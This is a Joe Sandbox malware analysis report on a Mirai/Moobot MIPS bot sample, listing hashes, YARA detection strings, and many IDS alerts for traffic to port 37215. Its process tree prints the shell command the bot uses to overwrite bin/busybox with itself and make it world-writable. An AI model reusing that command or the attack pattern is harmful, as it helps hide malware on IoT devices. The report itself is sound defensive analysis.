Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
bot.mips.elf

Overview

General Information

Sample name:bot.mips.elf
Analysis ID:1448925
MD5:c0e2c62a6224d9aa9e770ab1a2bda75b
SHA1:d166722d0757d17ef041adad3f899e92f25fca54
SHA256:f44f4227f6dcba81fe0b5e6b1b7b966d7747e2c01f4b637462c7ccba520f4a93
Tags:Mirai
Infos:

Detection

Mirai, Moobot
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Yara detected Moobot
Connects to many ports of the same IP (likely port scanning)
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "rm" command used to delete files or directories
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1448925
Start date and time:2024-05-29 15:14:30 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 6s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bot.mips.elf
Detection:MAL
Classification:mal100.troj.linELF@0/0@6/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: bot.mips.elf
Command:/tmp/bot.mips.elf
PID:5426
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • bot.mips.elf (PID: 5426, Parent: 5348, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/bot.mips.elf
    • sh (PID: 5430, Parent: 5426, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "rm -rf bin/busybox && mkdir bin; >bin/busybox && mv /tmp/bot.mips.elf bin/busybox; chmod 777 bin/busybox"
      • sh New Fork (PID: 5432, Parent: 5430)
      • rm (PID: 5432, Parent: 5430, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf bin/busybox
      • sh New Fork (PID: 5433, Parent: 5430)
      • mkdir (PID: 5433, Parent: 5430, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir bin
      • sh New Fork (PID: 5434, Parent: 5430)
      • mv (PID: 5434, Parent: 5430, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /tmp/bot.mips.elf bin/busybox
      • sh New Fork (PID: 5435, Parent: 5430)
      • chmod (PID: 5435, Parent: 5430, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 bin/busybox
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
bot.mips.elfJoeSecurity_MoobotYara detected MoobotJoe Security
    bot.mips.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
      bot.mips.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        bot.mips.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
        • 0x24434:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24448:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2445c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24470:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24484:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24498:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x244ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x244c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x244d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x244e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x244fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24510:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24524:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24538:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2454c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24560:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24574:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x24588:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x2459c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x245b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        • 0x245c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
        SourceRuleDescriptionAuthorStrings
        5426.1.00007fa458400000.00007fa458427000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
          5426.1.00007fa458400000.00007fa458427000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
            5426.1.00007fa458400000.00007fa458427000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
              5426.1.00007fa458400000.00007fa458427000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
              • 0x24434:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24448:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x2445c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24470:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24484:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24498:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x244ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x244c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x244d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x244e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x244fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24510:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24524:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24538:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x2454c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24560:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24574:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x24588:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x2459c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x245b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              • 0x245c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
              Process Memory Space: bot.mips.elf PID: 5426JoeSecurity_Mirai_6Yara detected MiraiJoe Security
                Click to see the 2 entries
                Timestamp:05/29/24-15:15:28.852848
                SID:2835222
                Source Port:57552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032348
                SID:2835222
                Source Port:45328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990213
                SID:2835222
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532694
                SID:2829579
                Source Port:52322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.384331
                SID:2835222
                Source Port:47376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.714070
                SID:2835222
                Source Port:37898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765069
                SID:2829579
                Source Port:39070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.536750
                SID:2835222
                Source Port:52892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612189
                SID:2829579
                Source Port:34588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443294
                SID:2835222
                Source Port:39806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417794
                SID:2835222
                Source Port:43506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666786
                SID:2835222
                Source Port:57404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436032
                SID:2835222
                Source Port:59006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.216780
                SID:2835222
                Source Port:34632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967606
                SID:2829579
                Source Port:45452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942923
                SID:2835222
                Source Port:41818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929614
                SID:2835222
                Source Port:42950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555716
                SID:2829579
                Source Port:57366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719572
                SID:2835222
                Source Port:42436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783995
                SID:2835222
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.287062
                SID:2829579
                Source Port:56814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971445
                SID:2835222
                Source Port:55896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.014471
                SID:2835222
                Source Port:49606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.121280
                SID:2835222
                Source Port:37788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.587084
                SID:2829579
                Source Port:60356
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843893
                SID:2829579
                Source Port:45120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.503592
                SID:2835222
                Source Port:60404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062714
                SID:2835222
                Source Port:53820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659491
                SID:2829579
                Source Port:60214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520423
                SID:2835222
                Source Port:50550
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209266
                SID:2835222
                Source Port:37420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432052
                SID:2829579
                Source Port:58226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359298
                SID:2835222
                Source Port:49108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372380
                SID:2835222
                Source Port:51762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436266
                SID:2829579
                Source Port:54440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.558158
                SID:2835222
                Source Port:46294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.816509
                SID:2835222
                Source Port:45842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899192
                SID:2829579
                Source Port:46648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233159
                SID:2835222
                Source Port:35096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.688959
                SID:2829579
                Source Port:33666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.499776
                SID:2835222
                Source Port:39038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140801
                SID:2829579
                Source Port:49104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872773
                SID:2835222
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.228869
                SID:2829579
                Source Port:54268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.962843
                SID:2829579
                Source Port:43154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.547627
                SID:2835222
                Source Port:44054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.837428
                SID:2829579
                Source Port:49348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364009
                SID:2829579
                Source Port:57088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.262076
                SID:2829579
                Source Port:42186
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852364
                SID:2835222
                Source Port:39394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.890881
                SID:2835222
                Source Port:33150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989779
                SID:2835222
                Source Port:55154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162339
                SID:2835222
                Source Port:40552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.897296
                SID:2835222
                Source Port:36514
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140423
                SID:2829579
                Source Port:39824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.662081
                SID:2835222
                Source Port:34842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.944928
                SID:2835222
                Source Port:58434
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990371
                SID:2835222
                Source Port:33160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007555
                SID:2835222
                Source Port:44994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.517776
                SID:2835222
                Source Port:36456
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685595
                SID:2835222
                Source Port:53512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.550773
                SID:2835222
                Source Port:44314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903657
                SID:2835222
                Source Port:46714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.565202
                SID:2829579
                Source Port:59848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779743
                SID:2829579
                Source Port:45478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.032697
                SID:2835222
                Source Port:44108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.058566
                SID:2829579
                Source Port:53102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266168
                SID:2829579
                Source Port:50132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441096
                SID:2835222
                Source Port:34074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669392
                SID:2835222
                Source Port:56928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318708
                SID:2835222
                Source Port:44536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.007669
                SID:2835222
                Source Port:56980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240369
                SID:2835222
                Source Port:50648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617984
                SID:2835222
                Source Port:38034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929820
                SID:2829579
                Source Port:45820
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037667
                SID:2835222
                Source Port:54694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980093
                SID:2829579
                Source Port:59610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221739
                SID:2835222
                Source Port:34382
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.817102
                SID:2829579
                Source Port:34780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.961079
                SID:2829579
                Source Port:47578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901027
                SID:2829579
                Source Port:37546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141777
                SID:2835222
                Source Port:39124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873504
                SID:2835222
                Source Port:59140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675070
                SID:2829579
                Source Port:35592
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430765
                SID:2829579
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227388
                SID:2835222
                Source Port:50374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.562876
                SID:2835222
                Source Port:54236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626471
                SID:2835222
                Source Port:49810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765092
                SID:2829579
                Source Port:45440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281735
                SID:2835222
                Source Port:34534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060852
                SID:2829579
                Source Port:55196
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277127
                SID:2835222
                Source Port:49140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.940887
                SID:2835222
                Source Port:54366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.921193
                SID:2829579
                Source Port:48154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227811
                SID:2829579
                Source Port:46928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415213
                SID:2829579
                Source Port:33846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263774
                SID:2835222
                Source Port:60654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.893711
                SID:2829579
                Source Port:56556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980061
                SID:2829579
                Source Port:55798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231988
                SID:2835222
                Source Port:56770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281681
                SID:2829579
                Source Port:48402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.581275
                SID:2835222
                Source Port:49134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.000885
                SID:2835222
                Source Port:40964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794372
                SID:2829579
                Source Port:46734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226927
                SID:2835222
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.514615
                SID:2829579
                Source Port:59930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.814531
                SID:2835222
                Source Port:50572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228472
                SID:2829579
                Source Port:60076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584177
                SID:2829579
                Source Port:32936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262062
                SID:2829579
                Source Port:60570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.290384
                SID:2829579
                Source Port:58264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899087
                SID:2829579
                Source Port:52226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933265
                SID:2835222
                Source Port:34944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261847
                SID:2829579
                Source Port:47572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901959
                SID:2829579
                Source Port:33682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.919155
                SID:2835222
                Source Port:54108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035243
                SID:2835222
                Source Port:55292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653753
                SID:2829579
                Source Port:57800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419251
                SID:2835222
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964290
                SID:2835222
                Source Port:48904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782756
                SID:2835222
                Source Port:60466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435034
                SID:2829579
                Source Port:46588
                Destination Port:37215
